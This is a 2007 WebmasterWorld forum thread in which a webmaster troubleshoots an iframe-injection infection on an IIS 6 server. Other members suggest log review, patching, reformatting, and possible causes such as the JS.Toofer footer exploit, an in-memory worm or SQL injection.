Welcome to WebmasterWorld Guest from 54.226.27.104

Forum Moderators: ocean10000

Message Too Old, No Replies

Virus Attack on web server

Iframe code getting added to each page request

     

Jalinder

7:25 pm on Mar 12, 2007 (gmt 0)

10+ Year Member



We are facing a virus attack that is injecting a line of HTML above all other HTML for each page request. The code is iframe with src of a virus hosting site that tries to install malicious software on user's computer.

Anyone had such experience before?

Also, please recommend a good anti-virus program for Windows Server 2003. This is for a dedicated web server (IIS 6 on Windows 2003 Server).

Thanks in advance.

Ocean10000

9:38 pm on Mar 12, 2007 (gmt 0)

WebmasterWorld Administrator 10+ Year Member Top Contributors Of The Month



(1) Question comes to mind how are they injecting it into the website? Has your server been compromised?
(2) And what are you doing to stop it?

Can you give us a little more detail without breaking anything in the TOS? So we can better handle on what is going on in your situation.

Jalinder

10:20 pm on Mar 12, 2007 (gmt 0)

10+ Year Member



We ran anti-virus scans, changed our passwords, etc. For now seems the problem is over, but I wanted to understand it better, and get a good anti-virus to avoid such problems in future.

Jalinder

10:24 pm on Mar 12, 2007 (gmt 0)

10+ Year Member



The line did not get injected in each file. The files were intact. But the extra HTML appeared on browser. Perhaps injection was at the IIS level. This happened to all websites hosted on this web server and to all URLs of each website.

Ocean10000

11:37 pm on Mar 12, 2007 (gmt 0)

WebmasterWorld Administrator 10+ Year Member Top Contributors Of The Month



Did the Virus scan turn up any virus's?
Did you check the logs to see what information you could gather on how they got into your machine to do this?
NT audit Logs
IIS web logs
http Error logs (IIS6 and up)

Basically changing the passwords, will only get you so far if they exploited a program on the server, more then likely they can do it again, and you will end up in the same situation.

There is always the possibility that they attackers installed a root kit on your machine, and anything you do besides a full format/reinstall might not be able to remove it.

Jalinder

5:15 am on Mar 13, 2007 (gmt 0)

10+ Year Member



Yes the problem is occuring again and again. Format seems to be the only way out.

Jalinder

6:14 am on Mar 13, 2007 (gmt 0)

10+ Year Member



We scanned using F-secure anti-virus, but the problem persists. F-secure scan did not find any malicious program on the system.

Jalinder

7:44 am on Mar 13, 2007 (gmt 0)

10+ Year Member



Anyone had similar experience before?

mattur

9:14 am on Mar 13, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



Try searching with the url, iframe and iis keywords to find other reports. As Ocean10000 says check your logs to see if you can identify its attack vector. If you can identify what it is you will be able to ascertain how it got on your server.

I would reformat and reinstall to be sure, then it is essential you patch and lock down the system, and then keep up to date with patches.

Jalinder

12:15 pm on Mar 13, 2007 (gmt 0)

10+ Year Member



Thanks for the guidance

mattur

1:06 pm on Mar 13, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



The exploit that appears to match your description is JS.toofer [www3.ca.com]. It works by setting up a footer included in all IIS-served pages. The footer is js that opens an iframe linked to malicious content.

AV software installed on your server won't necessarily protect against attacks where the server is compromised, you have to lockdown the box (see Securing IIS6 [microsoft.com]) and keep up-to-date with patches.

I think you should be able to check the footer setting in IIS MSC, it's in "Web site properties" -> "Documents" tab -> "Enable document footer" on IIS5. HTH.

Jalinder

4:56 pm on Mar 13, 2007 (gmt 0)

10+ Year Member



Thanks very much for taking time to reply.

Footer setting in IIS are not modified. Moreover the extra line is at the top. Most probably this virus is latest version of JS.Toofer

JS.Toofer used to modify the physical file on server. But in our case the HTML gets added even though it does not exist in the file.

When we start WWW services, pages work fine for few minutes, and then randomly it starts inserting the extra HTML line. So the HTML may appear sometimes and not not the other times .. certainly is not coming from the file itself, but somewhere else, at the IIS level.

Moreover, this happens for not just one but all sites hosted on the server.

Updates: we do regularly. Securing IIS link will certainly help.

The problem still exists so are having to keep our sites down ... until we find the problem.

LifeinAsia

5:35 pm on Mar 13, 2007 (gmt 0)

WebmasterWorld Administrator lifeinasia is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month



Just a thought- are you getting reports from your visitors seeing the same behavior, or have you just seen it from your own computer(s)? Any possibility the virus is on your computers and not the server?

Jalinder

5:53 pm on Mar 13, 2007 (gmt 0)

10+ Year Member



yes we received phone calls and emails from visitors, that's why we are preferring to keep sites shut till the problem is solved

Ocean10000

7:57 pm on Mar 13, 2007 (gmt 0)

WebmasterWorld Administrator 10+ Year Member Top Contributors Of The Month



This could be an issue of an injection attack on your server, thats only in memory. That is when you reset iis, it clears out the worm code, but in a few minutes later it is reinfected with the worm, which usually another server that is infected is scanning and infecting other servers. You might look up parts of the injected iframe like someone already said in a search engine and see what you can find out about this issue.

MidwestWebGuy

7:48 pm on Mar 16, 2007 (gmt 0)

10+ Year Member



This exact thing happened where I work. It turned out that it was a SQL inject. That's why the code never showed anything particular, but when the data from the DB was pulled, the code was then injected.

AffiliateDreamer

6:32 pm on Mar 18, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



Why not format the server?

Did you keep up with the patches?

 

Featured Threads

Hot Threads This Week

Hot Threads This Month